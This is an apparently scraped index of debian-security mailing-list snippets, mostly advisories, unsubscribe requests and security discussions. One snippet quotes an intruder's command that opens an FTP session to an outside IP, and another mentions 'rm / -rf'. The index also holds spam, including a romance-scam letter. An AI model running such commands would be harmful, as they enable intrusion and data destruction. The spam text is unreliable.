Request to join the team

Hi Team! My name is David Polverari, and I work with offensive security in the Brazilian Army. I have worked with and been mentored by both Eriberto and Thiago Andrade, and for the last two years I have maintained my own packages as a DM [1], and recently have become a DD. I have already

Re: Request for review/upload of firewalk 5.0-1

Hello Eriberto, Thanks for uploading! Regards, David On Fri, Apr 30, 2021 at 11:42:15PM -0300, Eriberto wrote: > Hi David, > > I just uploaded firewalk. Thanks for your work. > > Regards, > > Eriberto

Request for review/upload of firewalk 5.0-1

Hello team, I'm looking for a sponsor for a new package, firewalk [1]. Currently, it is a Kali-specific package [2]. Please, could you review it and upload it to experimental? Thanks. [1] https://salsa.debian.org/pkg-security-team/firewalk [2] http://pkg.kali.org/pkg/firewalk Regards, -- David

CVE-2016-6225 percona-xtrabackup Encryption IV Not Being Set Properly

trabackup/pull/266 <https://github.com/percona/percona-xtrabackup/pull/266> https://github.com/percona/percona-xtrabackup/pull/267 <https://github.com/percona/percona-xtrabackup/pull/267> ( If the intent is to backport the fix rather than jump the version ). Cheers David David Busby,

Re: not getting compromised while applying apt-get upgrade for CVE-2016-1252

volved as you can bootstrap from basically any system – getting apt to run on any system while not entirely impossible is considerably harder and it expects a reasonable systemstate to work with which a bootstrapping system is not… in exchange you don't get support for more advanced stuff like Valid-U

Re: Remove email

Hello, You need to send a mail to debian-security-requ...@lists.debian.org with "unsubscribe" as subject. You can also unsubscribe for some list here : https://www.debian.org/MailingLists/unsubscribe Best regards Le 31/03/2016 16:42, Tiffany Ryan a écrit : > > Please remove my email from you

Should Debian ask for a CPE when a CVE in Debian is found?

for identification. More info on requesting CPEs here: https://nvd.nist.gov/cpe.cfm I thought I'd raise the idea. Thanks! --- David A. Wheeler signature.asc Description: signature.asc

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

Hello, You can follow instructions on this URL: https://www.debian.org/MailingLists/#subunsub Or use this form : https://www.debian.org/MailingLists/unsubscribe Good bye Le 11/01/2016 00:04, David ISIDORE a écrit : > Hi, I'm not on Debian anymore. How can I unsubscribe from mailing l

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

Hi, I'm not on Debian anymore. How can I unsubscribe from mailing list? 2016-01-10 20:08 GMT+01:00 Michael Gilbert : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory

RE: [SECURITY] [DSA 3386-2] unzip regression update

Bonaccorso Sent: Wednesday, 11 November 2015 4:52 PM To: David McDonald <david.mcdon...@semagroup.com.au> Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org> Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi Dave, On Tue, Nov 10, 2015 at 09:54:19PM

RE: [SECURITY] [DSA 3386-2] unzip regression update

rom: Salvatore Bonaccorso [mailto:salvatore.bonacco...@gmail.com] On Behalf Of Salvatore Bonaccorso Sent: Tuesday, 10 November 2015 8:46 PM To: David McDonald <david.mcdon...@semagroup.com.au> Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org> Subject: Re: [SE

RE: [SECURITY] [DSA 3386-2] unzip regression update

Hi Salvatore, Your e-mail below states: "For the stable distribution (jessie), this problem has been fixed in version 6.0-16+deb8u2" (Note bene the last digit) However, https://www.debian.org/security/2015/dsa-3386 states: "For the stable distribution (jessie), these problems

Re: [SECURITY] [DSA 3265-1] zendframework security update

Unsubscribe On 20 May 2015 at 05:37, David Prévot da...@tilapin.org wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3265-1 secur...@debian.org http

Re: [SECURITY] [DSA 3149-1] condor security update

Hallo Günter Ich bim Stv. Security (bis Salvatore wieder da ist). Könntest Du prüfen, ob wir davon betroffen sind (s.u.)? Gruss David Schneider On 02.02.2015 19:50, Sebastien Delafond wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Re: [SECURITY] [DSA 3074-2] php5 regression update

Hello, Le 19/11/2014 11:49, Yves-Alexis Perez a écrit : so people are advised to keep kernel symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by default on Wheezy This setting is not set on my Wheezy machine. How can I set it permanently (i.e. across reboots). Best

Re: [SECURITY] [DSA 3074-2] php5 regression update

, david -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/546caccf.8070...@linux-france.org

Archive GPG key expiring process

after the attack happened with a new master key that would mean nobody could apt-get the debian-keyring package for the new public key. I am wondering if I am missing something. Is there a process for this possibility? Thanks -- David Hubner Software Engineer david.hub...@smoothwall.net

Re: about bash and Debian Lenny

Lenny in its current state. If you need to secure your old boxes you will have to look for alternative methods outside of supported packages. Think about improved firewalling. What attack vectors of the shellshock exploit are worrying to you? Regards, David 2014-10-01 13:45 GMT+02:00 Nikolay

Re: about bash and Debian Lenny

With Qmail exposed and being an attack vector I would advice to build your own updated bash package. You wont get official security updates. 2014-10-01 14:06 GMT+02:00 Nikolay Hristov ge...@stemo.bg: On 10/01/2014 02:58 PM, Konstantin Khomoutov wrote: On Wed, 1 Oct 2014 14:45:55 +0300

Re: about bash and Debian Lenny

Also about not thrusting people, you are sending to this list with your company email address and tell everyone here you have an exploitable qmail setup running. Be carefull with the information you make public. Regards, David 2014-10-01 14:17 GMT+02:00 David Dejaeghere david.dejaegh

Re: Checking for services to be restarted on a default Debian installation

coordination, or even i18n help if needed) if you wish to. Regards David signature.asc Description: OpenPGP digital signature

Re: Checking for services to be restarted on a default Debian installation

? Not restarting by default the DM seems to be nice thing to have. How does it work if the upgrade run in the background? Will all needed service be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Regards David signature.asc Description: OpenPGP digital signature

Re: Checking for services to be restarted on a default Debian installation

Le 07/09/2014 10:54, Paul Wise a écrit : On Sun, Sep 7, 2014 at 9:30 PM, David Prévot wrote: How does it work if the upgrade run in the background? Will all needed service be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Not sure what you mean

Re: Checking for services to be restarted on a default Debian installation

Regards David signature.asc Description: OpenPGP digital signature

Re: Please remove me from this list

Le 26/06/2014 16:06, Jason Fergus a écrit : Ha ha, made me laugh. Speaking of lists, I wish I knew how Evolution knows to ask if one would like to reply to the list or the sender. My work uses a bunch of mailing lists, and I always feel like I'm breaking list etiquette when I have to do a

Re: Debian mirrors and MITM

Le 30/05/2014 21:30, Joey Hess a écrit : Alfie John wrote: Taking a look at the Debian mirror list, I see none serving over HTTPS: https://www.debian.org/mirror/list https://mirrors.kernel.org/debian is the only one I know of. It would be good to have a few more, because there are

Re: Debian mirrors and MITM

Le 30/05/2014 22:02, Henrique de Moraes Holschuh a écrit : On Fri, 30 May 2014, Erwan David wrote: Le 30/05/2014 21:30, Joey Hess a écrit : Alfie John wrote: Taking a look at the Debian mirror list, I see none serving over HTTPS: https://www.debian.org/mirror/list https

Re: Debians security features in comparison to Ubuntu

Le 17/05/2014 18:38, Jan Moskyto Matejka a écrit : I might be misinterpreting your definition of meaningful, but I have been looking for a public entropy source for my Debian system for quite a while. If you can point me to the Debian equivalent of pollinate and https://entropy.ubuntu.com/

Re: finding a process that bind a spcific port

On Wed, Jan 22, 2014 at 02:33:27PM CET, Nico Angenon n...@creaweb.fr said: no output Thanks for all... Nico You may also try lsof -i udp:10001 Launch it as root, because a normal user cannot see the descriptors of processes owned by others. -- To UNSUBSCRIBE, email to

Re: MIT discovered issue with gcc

On 13Nov27:2356+1100, Scott Ferguson wrote: On 27/11/13 23:37, David L. Craig wrote: On 13Nov27:1423+1100, Scott Ferguson wrote: On 27/11/13 13:49, David L. Craig wrote: On 13Nov26:1545-0500, David L. Craig wrote: On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux

Re: MIT discovered issue with gcc

On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux distribution has 2 choices: (1) wait for upstream patches for bugs/vulnerabilities as they are found, or (2) recompile all packages with optimizations disabled. I don't think proposal #2 would get very far... Well, there's always -O1

Re: MIT discovered issue with gcc

On 13Nov26:1545-0500, David L. Craig wrote: On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux distribution has 2 choices: (1) wait for upstream patches for bugs/vulnerabilities as they are found, or (2) recompile all packages with optimizations disabled. I don't think proposal

Re: [SECURITY] [DSA 2758-1] python-django security update

Salvatore Bonaccorso car...@debian.org wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2758-1 secur...@debian.org http://www.debian.org/security/

Re: (Case MB46439) [SECURITY] [DSA 2641-2] libapache2-mod-perl2 update related to DSA 2641-1

I hope that is a golden ticket. I want to visit the chocolate factory! 2013/3/20 Mythic Beasts supp...@mythic-beasts.com Thank you for your mail to Mythic Beasts Support. Your query has been received, and we will respond shortly. Please preserve the case number in the subject line of any

Re: NULL Scan issues or something else?

On Fri, Feb 08, 2013 at 02:06:48PM CET, Daniel Curtis sidetripp...@gmail.com said: Hi Mr Erwan So, everything is okay? Even these strange logs mentioned earlier? I'm still curious about this rule; SYN,RST, ACK,FIN, PSH,URG, SYN,RST,ACK, FIN,PSH,URG What do you mean by writing, that I

Re: NULL Scan issues or something else?

Le 07/02/2013 19:34, Daniel Curtis a écrit : Hi Thank you all for your answers. They are very helpful. I have to mention some thing, which I forgot to write; * no running services * all ports are closed (according to e.g. nmap) * iptables has concerning rules about /INVALID/ packets *

Re: NULL Scan issues or something else?

Le 07/02/2013 21:22, Daniel Curtis a écrit : Hi, //(...)/Nothing that should bother you. / Okay, so far so good. But what about the rest of IP addresses, which occurred in logs? You have mentioned about a /bendel.debian.org http://bendel.debian.org/ website. I wonder why? Because that's the

Re: Use of DSA number for general announcements

Hi, Le 14/09/2012 01:47, Thijs Kinkhorst a écrit : On Fri, September 14, 2012 03:28, David Prevot wrote: This is a notice to inform you, that our previous PGP/GPG key expired. Thanks for notifying us on debian-security-announce@l.d.o, but I disagree that such an announcement deserves a DSA

Use of DSA number for general announcements (was: [DSA 2548-1] Debian Security Team PGP/GPG key change notice)

announcement. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJQUoguAAoJELgqIXr9/gny8xEP/jT7oCPsYppRuK5nsD5Mjg5K qPE8R6JZM/98okBQGmRE8X8kSC6Iz08+bwN11SfoBqw3j3mrZCEMUQG244oMnW3L I02Qq0s9ixwBCnPHGlLCn5R5tVjv9G5DcG4DkHNVBQb9BphL9hJxHSwAxBf5/yPH EW8sHJ

Bug#685646: Please advise a reliable version scheme for {stable,testing}{,-security}

memory isn't entirely failing me […] 16:46 adsb at least the multi-archive changes mean the upload signature is now only checked once, so the key expiry foo goes away Regards David -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable'), (500

Re: sun-java6-plugin outdated and vulnerable to an actively exploited security issue

On Thu, Aug 16, 2012 at 11:37:09AM CEST, Thijs Kinkhorst th...@debian.org said: Hi Adam, On Thu, August 16, 2012 07:56, echo083 wrote: The sun-java6 in the stable branch is the version 1.6.0_26 is there a plan for any security upgrade ? I'm afraid that's not possible. Oracle has

Re: [SECURITY] [DSA 2523-1] globus-gridftp-server security update

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Le 08/08/2012 20:25, Mike Mestnik a écrit : On 08/06/12 22:47, maestro wrote: #please unsubscribe me from this list # i do not find any link to do so. # thank you. Instructions can be found at the bottom, there is no link or URL. Actually,

Security Implications of DKMS?

of DKMS? How are you balancing the convenience (now sometimes need) of DKMS vs the risk of having compliers on servers? If your saying no, how are you getting the modules onto your secure systems? If this is a solved issue could you direct me to good documentatin? Thanks! David

Re: Debian Oval definitions for 2011

Thanks for your hint, Javier (author of the script used to generate those) and the security team CCed to gather more information. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJOlHEAAAoJELgqIXr9/gnys3oP/3HNW18rC4fNT8E9Ixrs3JIw 4NhzqFC4dd35M

Re: Debian LTS?

On 05/10/11 19:13, wer...@aloah-from-hell.de wrote: Hi all, a Debian LTS-Version would be so welcome and is definitly something that's missing for Debian. best, Werner Isn't it called stable ? -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of

Re: Debian LTS?

On 06/10/11 00:13, Sythos wrote: On Wed, 05 Oct 2011 19:13:33 +0200 wer...@aloah-from-hell.de wrote: Hi all, a Debian LTS-Version would be so welcome and is definitly something that's missing for Debian. in 18 years Debian released 6 stable, an avarage of 3 years between a stable

Fwd: Application Icons Design

: Draft for apps for twitter ===8==Original message text=== Hello David, Timeframe is 3 weeks. It's possible to discuss a budget next week with skype, Please try to ask the following icon designer: debian-security@lists.debian.org ===8===End of original message

Re: AUTO: Steve Bownas is out of the office. (returning 09/06/2011)

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Are we going to receive those every time he is out of the office? I hope someone will do something about it... On 2011-08-21 16:17, Steven Bownas wrote: I am out of the office until 09/06/2011. I will be out of the office from Mon Aug 22 through

Re: CVE Exploit

On Fri, Mar 11, 2011 at 04:08:29PM CET, Mike! nibl...@gmail.com said: On 03/11/2011 04:06 PM, Jordon Bedwell wrote: On 3/11/2011 9:04 AM, Andrey Rahmatullin wrote: On Fri, Mar 11, 2011 at 09:42:17AM -0500, hans wrote: rm / -rf worked fine last time I tried it on a VM as an experiment. It was

No DSA for isc-dhcp

Thanks in advance if you could fix this. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJNcY+AAAoJELgqIXr9/gnykEgQALEm6jwCTY2kwjFs7DnJfa3H jqJ3HCk/HpRbaG+PIezrb83+jyg3Ahnv4IgvXa7QrSblcnz7+cBrdJmfH+cYaiAp 5QJ+KtB3rYbpyKzyecmV9sEnMhjN6C5YL8wyy

Re: Bug#603470: libmapnik0.7: package linked against broken external AGG

it easier to read in future) Thank you, David -- . ''`. Debian developer | http://wiki.debian.org/DavidPaleino : :' : Linuxer #334216 --|-- http://www.hanskalabs.net/ `. `'` GPG: 1392B174 | http://deb.li/dapal `- 2BAB C625 4E66 E7B8 450A C3E1 E6AA 9017 1392 B174 diff --git a/debian

download video aulas cursos a distancia online

video aula online download de video aulas: Visite: http://www.cursoemvideoaulas.com download video aulas cursos a distancia online, video aula online download de video aulas, aulas canto aula violino, como fazer sushi video dança, video aula guitarra video dança do ventre, aula video direito

My dear friend!

, and I believe I am worth to find my happiness here. I hope after reading this letter you are still interested in me:) I will be waiting for your answer! Please write me on this address: drthressydav...@yahoo.com I love you so much, Dr Thressy David

unprivileged users may hijack forwarded X connections

if this has been addressed? Are there any plans to do so? Thanks! -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze

Re: unprivileged users may hijack forwarded X connections

. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze for long into an abyss, the abyss gazes also into you. On Tue, 29 Apr 2008

Re: Re: Is oldstable security support duration something to be proud of?

Please take this discussion off list. It has nothing to do with security. Take it to some list that has has to do with debian policy, announcements, the web-page or anyplace else where it might be relevent. Great job Security team. Thanks for all your work. -- David Ehle Computing Systems

Re: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several vulnerabilities

Moe sir what is the code for the phone I'm havin a brain fart -Original Message- From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] BCC: David Nowak [EMAIL PROTECTED] Creation Date: 1/29 1:04 pm Subject: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several

Debian suggestion on File Deletion

would ask for a password every time you would want to delete a file. To my knowledge, today the only way of protecting files in a similar way is to create different user profiles with different permissions. Hope you will take my suggestion into account. Regards, David

Restrict remote access by time?

, research leads, or input from those who have put together similar projects. Thanks in Advance! David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become

Re: spooky windows script

On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: Hello, Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed: %systemroot%\system32\cmd.exe cmd /c echo open 59.31.153.120 22783 ik echo user db

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 02:12 +0200, Joerg Jaspert wrote: On 10802 March 1977, Florent Rougon wrote: ... 2. I have to trust the integrity of db.debian.org. Signing the keys you would have to trust whoever signed it. Same thing. I don't see that as being the same thing at all. Without

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 21:57 +0200, Florent Rougon wrote: [ I think debian-admin have read enough about my request by now, so if you reply about verifying certificates and such, please consider dropping the CC. Thanks. ] Kurt Roeckx [EMAIL PROTECTED] wrote: See:

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 22:24 +0200, Joerg Jaspert wrote: On 10803 March 1977, Kurt Roeckx wrote: I assume you've used https and that you verified the certificate? And saw that it was issued by SPI? And then you looked up SPI's certificate? And you found that there is a text file with

Re: [SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service

+a1A1Bu9FvJ2AH1d6a D/j/V2QpP54= =AVqq -END PGP SIGNATURE- -- Regards, /\ David Kennedy CISSP \ / ASCII Ribbon Campaign Protect what you connect; X Against HTML Mail Look both ways before crossing the Net

Re: [SECURITY] [DSA 1172-1] New bind9 packages fix denial of service

with: Sep 9 00:28:15 stan named[5638]: couldn't open pid file '/var/run/bind/run/named.pid': Permission denied Sep 9 00:28:15 stan named[5638]: exiting (due to early fatal error) I just had to change the 'bind' users group to the new bind group. Dave, -- David Broome Sr. Programmer Analyst

Re: su - and su - what is the real difference?

. So, I would be interested in hearing what the additional security implications would be. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become

AW: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexecution

Wir verwenden glaub ich immer die aktuellste stable version. Lg. D -Ursprüngliche Nachricht- Von: Martin Schulze [mailto:[EMAIL PROTECTED] Gesendet: Montag, 01. Mai 2006 06:38 An: Debian Security Announcements Betreff: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary

Re: Pam module for hylafax

On Tue, 2006-04-18 at 17:39 +0400, Adarsh V.P wrote: hi i am using hylafax with debian sarge.I can only use the fax utilites(sendfax,faxstat,...) while logging in as root. Access is denied while trying to connect to the hylafax server from clients. i just made a module called hylafax and

unsubscribe

-Mensaje original- De: Martin Schulze [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 15 de marzo de 2006 9:43 Para: Debian Security Announcements Asunto: [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -

Re: Bonk vulnerability!

On Fri, 2006-03-03 at 13:01 -0700, Michael Loftis wrote: --On March 3, 2006 10:01:54 AM -0800 Zakai Kinan [EMAIL PROTECTED] wrote: I just installed a server with sarge 3.1 and after testing it with nessus it is vulnerable to bonk. I am trying to figure out how that is possible and

Re: [SECURITY] [DSA 926-1] New ketm packages fix privilege escalation

Hej, jag har julledigt, och kommer inte tillbaka förrän måndagen den 2:a januari. För installationsärenden, maila [EMAIL PROTECTED] eller ring payread på 08-20 83 70 Med vänliga hälsningar, David Ahlard -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble

Re: unsubscribe

On Thu, 2005-10-13 at 01:28 +0200, Peter Palfrader wrote: On Tue, 11 Oct 2005, Benjamin Maerte wrote: -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Learn to read the mails you're replying to, will you? Peter

Re: SELinux

On Thu, 2005-09-22 at 04:40 +1000, Arvind Autar wrote: Helllo, I have been using debian for quite some time now, how ever I have watched several distrobutions implentating so many great ideas, and I have been wondering why such a robust distorbution as debian GNU/Linux(*) hasn't done this.

Re: policy change is needed to keep debian secure

their system offline and not put the security line in their sources- as security will require changes at some level. I support introducting new packages when older versions can not be realisticly maintained with backported security fixes. -- David Ehle Computing Systems Manager CAPP CSRRI BIOCAT rm 077

Re: policy change is needed to keep debian secure

On Tue, 23 Aug 2005, Matt Zimmerman wrote: On Tue, Aug 23, 2005 at 12:04:17PM -0500, David Ehle wrote: As you can see in the subject, the OP understands the policy, but believes it should be changed. To what? The suggestions that I have seen so far seem to be reiterations

Re: policy change is needed to keep debian secure

I second this post. Dan, Thank you for saying so clearly. On Sat, 20 Aug 2005, Daniel Sterling wrote: Keeping Debian stable by not changing things is great. Except maybe its not so great when you're trying to maintain a complicated, buggy, high profile program that handles sensitive user

Re: On Mozilla-* updates

have servers that can be used to build at least two of the architectures. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster

Re: On Mozilla-* updates

fashion, and the situation either not be resolved or we do something stupid like drop mozilla. Just for the record I also vote against volitol. Security changes should go into stable proper. david. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL

Re: On Mozilla-* updates

Despite of the fact, the the release is probably unable to match the mozilla release cycles - do you really think, mozilla is the one and only package, debian is all about? Well, I mean the killer application, the thin that justify Debian? Keep smiling yanosz For my end users, who have

Re: On Mozilla-* updates

systems. Debian is MY opinion is as much a desktop distro as it is a server distro, and support for both is equally important. David. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

root login denied. But by what?

release of stable. Does anyone know what generated the above log entries? And why is there no ip? Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.co.uk/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when my girlfriend's away

Re: root login denied. But by what?

On Fri, Jun 17, 2005 at 10:47:49PM +0200, Marcin Owsiany wrote: On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote: Does anyone know what generated the above log entries? try: find /usr/sbin /sbin /usr/local/sbin \ /usr/bin /usr/local/bin /bin /usr/lib /lib -type f

systemware, teachware and artware from sixty dollrs

www.shwpvragelsh7ta.aladfala9.com ranimé pour devant promenasses, devant. marrerez extérioriserons septentrionales sous exaucerions le sans pénètrent les désenivrâtes. sans doserez les corroborassions mais réclamassions sucrer au-dessus ce amoncellerais coulée sans déterminassions. devant

Security status of orphaned woody packages when upgraded to sarge?

even if you check debian security advisories diligently. -- David Stanaway [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Re: User 501 and /usr/local

On Mon, 2005-05-09 at 07:30 -0700, JM wrote: I guess what I was trying to say should not this directory be owned by root and with a 755 permissions? Default debian permissions on /usr/local are: drwxrwsr-x 11 root staff 115 2005-03-23 13:42 local -davidc -- It is not the mountain we

Re: Dns refresh

There is really no excuse for such egregious cross posting. Please send questions to apppropriate mailing lists only, preferably one at a time. On Wed, 2005-04-27 at 15:58 -0300, Servilink Santiago Francos wrote: Hello, I have a server and I changed the ip number of the server and the

Snort log stuff

Over the last few days, I've seen the following type of entry in my snort report: The distribution of event methods === %# of method === 5.81 5 (portscan) TCP Portsweep 3

Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 17:55 +1000, Andrew M.A. Cater wrote: On Tue, Mar 29, 2005 at 05:08:32PM -0500, Noah Meyerhans wrote: On Wed, Mar 30, 2005 at 07:16:31AM +1000, David Pastern wrote: And this, in reality, is why Woody is so old. I cannot imagine any other distro providing

Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 20:34 +1000, Matthew Palmer wrote: On Wed, Mar 30, 2005 at 07:02:55PM +1000, David Pastern wrote: Redhat/Fedora/Suse/Mandrake are just plain silliness. However - there is a big difference between a one year release cycle, and the fact that it's been nearly 3 years

Re: OT - was Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 21:35 +1000, Ivan Brezina wrote: Let me point, that meanig of word stable is differnet for RedHat/SUSE. Debian stable is more like frozen - no bugfixes, no new drivers no new features. Just security fixes a and some critical fixes. RedHat stable is more like solid

Re: My machine was hacked - possibly via sshd?

On Tue, 2005-03-29 at 15:25 -0500, Noah Meyerhans wrote: On Tue, Mar 29, 2005 at 01:38:55PM +0100, Simon Heywood wrote: Sorry, but this isn't correct. kernel 2.4.18-1 in woody is patched against known vulnerability. The security team have quietly stopped updating it, preferring to

Re: My machine was hacked - possibly via sshd?

On Tue, 2005-03-29 at 07:25 +1000, Malcolm Ferguson wrote: Thanks for all the feedback everybody. It looks like an ssh dictionary attack discovered a weak password, followed by a local root exploit against an out-of-date kernel. From now on I will be sticking with an official Debian

Re: Analysis vulnerabilities associated to published security advisories, anyone?

with input and output. http://people.debian.org/~skx/2005/ Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached. Regards, David -- - hallo... wie gehts heute? - *hust* gut *rotz* *keuch* - gott sei dank kommunizieren wir über ein septisches medium

Re: Packet sniffing regular users

Alvin Oga wrote: ah .. good point ... i make no distinction between local access vs physical access in that if the server is behind the locked door, it'd be better than if its on the corp server in the next open cubicle on the same cat 5 wires, hubs and switches etc Physical access means they

Re: Packet sniffing regular users

s. keeling wrote: Do you understand what anyone can see anything really means? Have you pumped tcpdump output into ethereal lately? anyone can see anything really means anyone can see anything. Think about it. And what's the real reason why you don't want to bother with sudo? I'm curious,

Re: Packet sniffing regular users

s. keeling wrote: ... should be != are. Are you sure no-one there's using telnet, ftp, etc? If they send their confidential data unencrypted, that's not my fault, and there's not much I can do to stop them (even if I somehow make it impossible on my computers, they could still go to a library

Re: Packet sniffing regular users

s. keeling wrote: Isn't it generally accepted that black hats who get local access (ie., a user login account) is _much_ worse than black hats who've been kept out? Assuming black hat wants root, taking over a user's account is a very big first step. I would take the security of your user's

Re: Packet sniffing regular users

Alvin Oga wrote: no more telnet, no more pop3, no more wireless, no more anything that is insecure Those are not insecure: using them unwisely is. Telnet over a VPN is just as secure as ssh with password authentication. The same goes for pop3/pop3s. Wireless is completely different

RE: Rkhunter : old or patched

Hi I also use rkhunter and have noticed this. Before I upgraded to rkhunter 1.1.9 I used 1.1.8 and used to get a different message when it does an application version scan, it used to moan and say that I have vuln packages when I'm pretty sure I didn't as I ran security updates/upgrades everyday

Re: [SECURITY] [DSA 644-1] New chbg packages fix arbitrary code execution

archives at lists.ubuntu.com for the Scary .desktop behaviour thread. I was pondering complicated solutions with alternate stream hacks (like XPSP2 uses), but your suggestion is much simpler and would require minimal changes to the system. On Wed, 2005-01-19 at 06:52 -0500, David Mandelberg

  1   2   3   4   >